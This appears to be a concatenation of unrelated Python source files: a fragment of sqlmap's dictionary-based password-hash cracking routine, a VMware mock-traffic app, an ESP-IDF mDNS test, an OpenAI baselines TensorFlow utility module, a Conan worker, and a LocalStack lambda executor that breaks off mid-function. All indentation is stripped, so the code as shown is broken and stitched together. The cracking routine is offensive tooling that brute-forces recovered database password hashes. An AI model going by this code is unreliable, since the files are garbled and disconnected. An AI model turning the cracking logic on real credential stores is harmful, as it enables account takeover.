while not kb.wordlists:
# the slowest of all methods hence smaller default dict
if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS):
dictPaths = [paths.SMALL_DICT]
else:
dictPaths = [paths.WORDLIST]
message = "what dictionary do you want to use?\n"
message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0]
message += "[2] custom dictionary file\n"
message += "[3] file with list of dictionary files"
choice = readInput(message, default='1')
try:
if choice == '2':
message = "what's the custom dictionary's location?\n"
_ = readInput(message)
if _:
dictPaths = [readInput(message)]
logger.info("using custom dictionary")
elif choice == '3':
message = "what's the list file location?\n"
listPath = readInput(message)
checkFile(listPath)
dictPaths = getFileItems(listPath)
logger.info("using custom list of dictionaries")
else:
logger.info("using default dictionary")
dictPaths = filter(None, dictPaths)
for dictPath in dictPaths:
checkFile(dictPath)
if os.path.splitext(dictPath)[1].lower() == ".zip":
_ = zipfile.ZipFile(dictPath, 'r')
if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % dictPath
raise SqlmapDataException(errMsg)
else:
_.open(_.namelist()[0])
kb.wordlists = dictPaths
except Exception, ex:
warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % getSafeExString(ex)
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "
if readInput(message, default='N', boolean=True):
suffix_list += COMMON_PASSWORD_SUFFIXES
infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name
logger.info(infoMsg)
for item in attack_info:
((user, _), _) = item
if user and not user.startswith(DUMMY_USER_PREFIX):
custom_wordlist.append(normalizeUnicode(user))
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC):
for suffix in suffix_list:
if not attack_info or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count()
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
retVal = Queue()
_bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api)
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
else:
for ((user, hash_), kwargs) in attack_info:
if processException:
break
if any(_[0] == user and _[1] == hash_ for _ in results):
continue
count = 0
found = False
for suffix in suffix_list:
if found or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count()
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
found_ = _multiprocessing.Value('i', False)
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
found = found_.value != 0
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
class Value():
pass
retVal = Queue()
found_ = Value()
found_.value = False
_bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api)
found = found_.value
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
results.extend(resumes)
if foundHash and len(hash_regexes) == 0:
warnMsg = "unknown hash format"
logger.warn(warnMsg)
if len(results) == 0:
warnMsg = "no clear password(s) found"
logger.warn(warnMsg)
return results
|
mocktraffic.py
|
#!/usr/bin/env python
# Copyright (c) 2020-2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2 License
# The full license information can be found in LICENSE.txt
# in the root directory of this project.
import logging
import os
import queue
import threading
import time
from lydian.apps.base import BaseApp, exposify
from lydian.traffic.core import TrafficRecord, TrafficRule
from lydian.utils.common import get_mgmt_ifname
from lydian.utils.network_utils import InterfaceManager
log = logging.getLogger(__name__)
@exposify
class MockTraffic(BaseApp):
REPORT_INTERVAL = 5
def __init__(self, rqueue, interval=None, proc_name='runner'):
"""
A simple resource monitor that writes cpu / memory percentage
to wavefront at requested interval.
"""
self._rqueue = rqueue # records queue to put records onto.
self._interval = interval or self.REPORT_INTERVAL
self._stop_switch = threading.Event()
self._stop_switch.set() # Stopped until started.
self._thread = None
self._dummy_rule = {}
# Host is where this app is running. Based on host,
# it is decided for a rule if we need to run a client
# or server.
ifname = get_mgmt_ifname()
self.host = InterfaceManager().get_interface(ifname)['address']
@property
def enabled(self):
return not self._stop_switch.is_set()
def register_traffic(self, rules):
for rule in rules:
if not isinstance(rule, TrafficRule):
log.error("Improper rule : %r", rule)
continue
if self.host == rule.src_host:
# For client side just do a bookkeeping.
self._dummy_rule[rule.ruleid] = rule
if self.host == rule.dst_host: # Noop for server
continue
log.info("Registered traffic : %r", rule.ruleid)
def ping(self):
while not self._stop_switch.is_set():
# Put logic for running traffic here.
# Process the response and create Traffic Record
# like below and put on the queue. It will be pushed
# onto corresponding databases.
for ruleid, trule in self._dummy_rule.items():
# as an example, create dummy records for each ruleid
# asked to be handled by this tool.
try:
rec = TrafficRecord()
rec.source = '0.0.0.0'
rec.destination = '0.0.0.0'
rec.protocol = 'TCP'
rec.port = '00'
rec.result = True
rec.reqid = trule.reqid
rec.ruleid = ruleid
rec.latency = '0'
self._rqueue.put(rec, block=False, timeout=2)
log.info("Traffic: %r", rec)
except queue.Full as err:
log.error("Cann't put Traffic Record %r into the queue: %r",
rec, err)
except Exception as err:
log.error("Error in puytting dummy records %r ", err, exc_info=err)
time.sleep(self._interval)
def is_running(self):
"""
Returns True if Rescoures are being monitored else False.
"""
return self._thread and self._thread.is_alive()
def start_traffic(self, trule):
self._dummy_rule[trule.ruleid] = trule
log.info("Starting traffic for rule : %s", trule.ruleid)
def stop_traffic(self, trule):
self._dummy_rule.pop(trule.ruleid)
log.info("Stopped traffic for rule : %s", trule.ruleid)
def stop(self):
"""
Stops Resource Monitoring.
"""
self._stop_switch.set()
if self.is_running():
self._thread.join()
self._thread = None
log.info("Stopped resource monitoring.")
def start(self):
"""
Starts Resource monitoring (in a separate thread)
"""
self._stop_switch.clear()
if not self._thread:
self._thread = threading.Thread(target=self.ping)
self._thread.setDaemon(True)
self._thread.start()
log.info("Started resource monitoring.")
|
mdns_example_test.py
|
import re
import os
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
from tiny_test_fw import DUT
import ttfw_idf
# g_run_server = True
# g_done = False
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
4. check DUT output if mdns advertized host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
# 4. check DUT output if mdns advertized host is resolved
try:
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
tf_util.py
|
"""
Taken from https://github.com/openai/baselines
"""
import collections
import copy
import functools
import multiprocessing
import os
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(
name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from openai_baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " " * (55 - len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params * 1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from openai_baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from openai_baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
conan_worker.py
|
from queue import Queue
from threading import Thread
# this allows to use forward declarations to avoid circular imports
from typing import TYPE_CHECKING, List
from PyQt5 import QtCore
from conans.model.ref import ConanFileReference
from conan_app_launcher.base import Logger
from conan_app_launcher.components.conan import ConanApi
if TYPE_CHECKING:
from conan_app_launcher.components import TabEntry
class ConanWorker():
""" Sequential worker with a queue to execute conan commands and get info on packages """
def __init__(self, tabs: List["TabEntry"], gui_update_signal: QtCore.pyqtSignal):
self._conan = ConanApi()
self._conan_queue: "Queue[Tuple[str, Dict[str, str]]]" = Queue(maxsize=0)
self._version_getter = None
self._worker = None
self._closing = False
self._gui_update_signal = gui_update_signal
self._tabs = tabs
# get all conan refs and make them unique # TODO separate this from worker
conan_refs = []
for tab in tabs:
for app in tab.get_app_entries():
ref_dict = {"name": str(app.conan_ref), "options": app.conan_options}
if not ref_dict in conan_refs:
conan_refs.append(ref_dict)
# fill up queue
for ref in conan_refs:
self._conan_queue.put([ref["name"], ref["options"]])
# start getting versions info in a separate thread
self._version_getter = Thread(target=self._get_packages_versions, args=[ref["name"], ])
self._version_getter.start()
self.start_working()
def put_ref_in_queue(self, conan_ref: str, conan_options: {}):
self._conan_queue.put([conan_ref, conan_options])
self.start_working()
def start_working(self):
""" Start worker, if it is not already started (can be called multiple times)"""
if not self._worker or not self._worker.is_alive():
self._worker = Thread(target=self._work_on_conan_queue, name="ConanWorker")
self._worker.start()
def finish_working(self, timeout_s: int = None):
""" Cancel, if worker is still not finished """
self._closing = True
if self._worker and self._worker.is_alive():
self._worker.join(timeout_s)
if self._version_getter and self._version_getter.is_alive():
self._version_getter.join(timeout_s)
self._conan_queue = Queue(maxsize=0)
self._worker = None # reset thread for later instantiation
def _work_on_conan_queue(self):
""" Call conan operations from queue """
while not self._closing and not self._conan_queue.empty():
conan_ref, conan_options = self._conan_queue.get()
package_folder = self._conan.get_path_or_install(
ConanFileReference.loads(conan_ref), conan_options)
# call update on every entry which has this ref
for tab in self._tabs:
for app in tab.get_app_entries():
if str(app.conan_ref) == conan_ref:
app.set_package_info(package_folder)
Logger().debug("Finish working on " + conan_ref)
if self._gui_update_signal:
self._gui_update_signal.emit()
self._conan_queue.task_done()
def _get_packages_versions(self, conan_ref):
available_refs = self._conan.search_for_all_recipes(ConanFileReference.loads(conan_ref))
if not available_refs:
return
for tab in self._tabs:
for app in tab.get_app_entries():
if not self._closing and str(app.conan_ref) == conan_ref:
app.set_available_packages(available_refs)
if not self._closing and self._gui_update_signal:
self._gui_update_signal.emit()
|
lambda_executors.py
|
import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
